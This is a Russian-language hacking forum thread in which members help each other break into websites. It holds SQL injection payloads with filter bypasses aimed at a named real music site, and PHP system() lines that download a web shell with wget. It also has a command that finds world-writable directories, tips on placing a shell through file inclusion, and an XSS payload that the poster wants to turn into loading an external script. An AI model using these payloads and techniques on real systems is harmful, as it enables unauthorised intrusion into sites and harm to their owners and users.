Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Три варианта:
    1) Ищи другую папку
    2) Пробуй чтото вроде chmod_R(/, 0777);
    3) Либо попытайся удалить .htaccess
     
  2. ldschooler

    ldschooler Banned

    Joined:
    14 Oct 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    1) Пробовал уже. Ничего не меняется.
    2) "777" стоят на папках и если в папку залить тупо шелл - он запустится без проблем.
    3) Не помогает.
     
  3. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Листинг директорий конечно же не включён?(
     
  4. ldschooler

    ldschooler Banned

    Joined:
    14 Oct 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Понятия не имею.. это вообще что такое?
    Можно твой номер icq в ПМ?
    Там удобнее просто было бы
     
  5. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Инфо по suhosin ищи сам =)
     
  6. 0xd098d0b3d0

    0xd098d0b3d0 New Member

    Joined:
    26 Oct 2012
    Messages:
    54
    Likes Received:
    1
    Reputations:
    0
    У меня такой вопрос.
    Является ли нарушением УК или каких нить там еще кодексов, то что я выкладываю SQL inj в соответсвующий топик, в формате http://site.com/index.php?go=1+union+select 1,2,3 +--+
     
  7. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Проверь сам. Когда выкладываешь скулю внизу красным цветов пиши по шаблон:

    ФИО
    Адрес где проживаешь
    Номер паспорта
     
    1 person likes this.
  8. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Является. У тебя преступный умысел etc.
     
  9. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Ну, у меня опять проблемы с фильтрацией:( Пробую так
    http://www.mp3hun gama.com/music/genre_albums.php?id=3+(union)/**/(select+1,2,3)+--+, но чего-то я не учел... Заранее благодарен.
     
  10. 0xd098d0b3d0

    0xd098d0b3d0 New Member

    Joined:
    26 Oct 2012
    Messages:
    54
    Likes Received:
    1
    Reputations:
    0
    Я думаю, и без этого можно обойтись, если появится интерес к тебе и так найдут...
     
  11. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    http://www.mp3hungama.com/music/genre_albums.php?id=-3+union%0Aselect+1,2,3+--+
    ток либо вывода нет, либо я не увидел, если нет, то через ошибку надо крутить..
     
    1 person likes this.
  12. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    _ttp://www.mp3hungama[antigoogle]com/music/genre_albums.php?id=3+or+1+group%0aby+mid(version(),rand(0)|0)+having+avg(0)+--+-
     
    2 people like this.
  13. Stricker

    Stricker New Member

    Joined:
    20 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Проблема вот в чем:
    Сначало rawurldecode а потом:
    function quote_smart($in)
    {
    if (is_int($in) || is_double($in)) {
    return $in;
    } elseif (is_bool($in)) {
    return $in ? 1 : 0;
    } elseif (is_null($in)) {
    return 'NULL';
    } else {
    return "'" . str_replace("'", "''", $in) . "'";
    }
    }
     
  14. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Вечер добрый. Как построить строчку, чтобы загрузить в другой каталог? Или может использовать не wget?
    <?php system('wget http://site/shell.php') ?>
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    <?php system('cd другой_каталог;wget http://site/shell.php'); ?>
    или
    <?php system('wget http://site/shell.php -O /другой_каталог/shell.php'); ?>
     
    _________________________
  16. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    А можно как нибудь вывести адреса папок с 0777 через php?
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    find / -type d -perm 0777
     
    _________________________
  18. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Залил в дирректорию с 0777, проинклюдил, появился шел, но при нажатии пустое окно. И error log больше не идет(( LFI
     
  19. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Попробуй залить то же самое, только как txt файл - и посмотри, мб код сломан.
     
  20. foxxx1234

    foxxx1234 Member

    Joined:
    26 Nov 2008
    Messages:
    0
    Likes Received:
    7
    Reputations:
    0
    Есть активка "><img src=f onerror=alert('x') /> возможно через нее загрузить скрипт? словo script и все составляющие не проходят. Нужно чтобы работало на подобии <script src='http://sait.ru/f.js'>
     
Thread Status:
Not open for further replies.